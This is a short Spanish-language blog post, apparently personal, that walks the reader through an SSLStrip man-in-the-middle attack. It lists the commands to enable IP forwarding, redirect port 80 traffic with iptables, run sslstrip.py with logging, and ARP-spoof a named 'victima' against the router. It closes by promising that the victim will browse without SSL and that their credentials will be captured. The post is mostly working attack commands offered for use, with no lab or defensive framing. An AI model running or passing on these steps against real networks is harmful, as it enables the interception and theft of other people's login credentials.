si eres como yo, que habías retrasado la prueba de SSLStrip deja lo que estés haciendo y mira este video de Securitytube sobre SSLStrip o simplemente:
- Descarga SSLstrip http://www.thoughtcrime.org/software/sslstrip/
- #> echo "1" > /proc/sys/net/ipv4/ip_forward
- #> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
- $> python sslstrip.py -w captura_datos_sniff
- #> arpspoof -i eth0 -t IP_Victima IP_router
Y tendrás a tu victima navegando sin SSL y además capturarás sus credenciales.
David
No hay comentarios:
Publicar un comentario